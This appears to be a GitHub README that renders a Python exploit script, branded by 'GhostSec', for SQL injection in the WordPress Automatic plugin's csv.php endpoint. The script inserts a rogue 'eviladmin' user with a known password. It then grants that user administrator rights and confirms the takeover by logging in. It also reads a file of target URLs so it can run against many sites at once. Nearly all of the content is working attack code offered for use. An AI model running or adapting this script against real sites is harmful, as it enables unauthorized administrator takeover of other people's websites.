README.md
Rendering markdown...
import requests
import sys
import pyfiglet
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
RED = "\033[91m"
GREEN = "\033[92m"
BOLD = "\033[1m"
RESET = "\033[0m"
def print_banner():
ascii_art = pyfiglet.figlet_format("Ghost_Exploit", font="standard")
print(f"{BOLD}{RED}{ascii_art}{RESET}")
print(f"{BOLD}{GREEN}💀 Remote Code Execution in Wordpress automatic Plugin POC | By GhostSec 💀{RESET}\n")
def print_usage():
print(f"{BOLD}{RED}Usage: python exploit.py targets.txt OR python exploit.py http://example.com{RESET}")
print(f"{BOLD}{RED}Options:{RESET}")
print(f"{BOLD}{GREEN} Example python RCE_Exploit.py -u http://testphp.vulnweb.com/{RESET}")
print(f"{BOLD}{RED} targets.txt File containing target URLs, one per line.{RESET}")
print(f"{BOLD}{RED} http://example.com A single target URL to exploit.{RESET}")
def makeRequest(payload, hash, url):
host = url.split('/', 3)[2]
headers = {
'Host': host,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-type': 'application/x-www-form-urlencoded',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
data = {'q': payload, 'auth': b'\0', 'integ': hash}
return requests.post(url, data=data, headers=headers, verify=False)
def check_login(url):
login_url = url + '/wp-login.php'
payload = {
'log': 'eviladmin',
'pwd': 'admin',
'wp-submit': 'Log In',
'redirect_to': url + '/wp-admin/',
'testcookie': '1'
}
response = requests.post(login_url, data=payload, verify=False)
return 'Dashboard' in response.text
def exploit(target):
url = target + '/wp-content/plugins/wp-automatic/inc/csv.php'
print(f"{BOLD}{GREEN}[+] Creating user eviladmin on {target}{RESET}")
response = makeRequest(
"INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '[email protected]', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')",
"09956ea086b172d6cf8ac31de406c4c0", url)
if "Tampered query" in response.text or "invalid login" in response.text or "login required" in response.text:
print(f"{BOLD}{RED}[!] Error in the payload on {target}{RESET}")
return
if "DATE" not in response.text:
print(f"{BOLD}{RED}[!] Not vulnerable: {target}{RESET}")
return
print(f"{BOLD}{GREEN}[+] Giving eviladmin administrator permissions on {target}{RESET}")
makeRequest(
"INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')",
"bd98494b41544b818fa9f583dadfa2bb", url)
print(f"{BOLD}{GREEN}[+] Exploit completed on {target}!{RESET}")
print(f"{BOLD}{GREEN}[+] Administrator created: eviladmin:admin{RESET}")
if check_login(target):
print(f"{BOLD}{GREEN}[+] Login successful for eviladmin on {target}!{RESET}")
else:
print(f"{BOLD}{RED}[!] Login failed for eviladmin on {target}.{RESET}")
def load_targets(file_path):
with open(file_path, 'r') as file:
return file.read().splitlines()
if __name__ == "__main__":
print_banner()
if len(sys.argv) < 2:
print_usage()
sys.exit()
if sys.argv[1] == '-h':
print_usage()
sys.exit()
targets = []
if len(sys.argv) == 2:
file_path = sys.argv[1]
try:
targets = load_targets(file_path)
except FileNotFoundError:
print(f"{BOLD}{RED}[!] File not found: {file_path}{RESET}")
sys.exit()
elif len(sys.argv) == 3:
target = sys.argv[2]
targets = [target]
for target in targets:
exploit(target)